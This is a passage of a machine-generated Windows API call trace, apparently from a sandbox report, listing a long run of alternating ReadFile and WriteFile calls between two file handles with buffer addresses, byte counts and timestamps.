nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.610] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.610] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.611] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.611] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.612] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.612] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.613] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.615] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.616] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.616] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.617] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.617] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x377, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.617] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.618] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.619] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.619] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.619] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.620] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.620] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.621] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.622] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.622] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.623] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.623] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.624] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.624] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.625] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.625] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.625] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.626] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.626] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.627] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.627] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.628] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.628] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.629] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.630] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.630] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.631] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.631] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.631] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.632] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.632] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.633] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.633] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.634] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.634] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.635] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.635] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.636] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.637] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.637] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.638] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.638] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.639] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.639] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.640] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.640] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.640] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.641] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.641] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.642] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.642] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.643] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.643] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.644] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.644] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.645] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.645] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.646] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.646] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.646] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.647] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.647] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.648] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.648] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.649] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.649] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.650] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.650] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.650] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.651] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.651] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.652] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.652] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.653] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.653] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.654] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.654] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.655] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x365, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.655] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.655] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.656] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.656] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.657] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x18f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 